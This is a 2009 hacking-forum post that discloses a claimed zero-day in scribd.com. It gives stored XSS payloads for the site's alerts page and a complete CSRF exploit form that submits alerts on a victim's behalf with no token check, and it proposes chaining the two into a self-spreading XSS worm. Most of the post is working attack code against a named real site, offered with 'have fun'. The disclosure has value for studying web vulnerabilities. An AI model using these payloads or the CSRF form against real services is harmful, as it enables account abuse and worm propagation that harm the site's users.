Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
MULTIPLE VULNERABILITY(xss,csrf,worm) on www.scribd.com
Posted by: XaDoS
Date: September 18, 2009 03:57PM

The site http://www.srcibd.com, a network community(che Obama ha usato per la sua campagna elettorale) it's a big community that fight with amazon.com for the 1° most visited site at world. (now scribd have 55 milion of visit evry month)

It's vulnerable to xss, permanent xss, js injection and CSRF

#### XSS:

### Permanent XSS:

(after login)
at page http://www.scribd.com/alerts a user can write a new alert, but with malicious js code like:
Name of alert: "><script>alert(1)</script>
text of alert: "><script>alert(2)</script>

and so post request are like..
<input id="alert_name" name="alert[name]" size="30" style="width: 500px;" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" type="text">

<textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">"&gt;&lt;script&gt;alert(2)&lt;/script&gt;</textarea>

and there are no token or captcha, so an attaker can write a csrf code like this( working!):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<title>scribd csrf exploit</title>
<meta http-equiv="Content-Type" content="text/HTML; charset=UTF-8" />
<form name="xados" action="http://www.scribd.com/alerts" class="new_alert" id="new_alert" method="post">
    <input id="alert_word_user_id" name="alert[word_user_id]" type="hidden" value="[ID-VICTIM]" />
        <input id="alert_name" name="alert[name]" size="30" style="width: 500px;" type="text" value="[TITLE]" />
    <textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">[MESSAGE]</textarea>
        <input checked="checked" id="alert_matchmode_2" name="alert[matchmode]" type="radio" value="2" />
    <input id="alert_matchmode_1" name="alert[matchmode]" type="radio" value="1" />
    <input name="commit" type="submit" value="submit" />

and trought this csrf can create an xss worm that self
reply trought alerts xss permanet vuln.

have fun.
0-day by XaDoS

Options: ReplyQuote

Sorry, only registered users may post in this forum.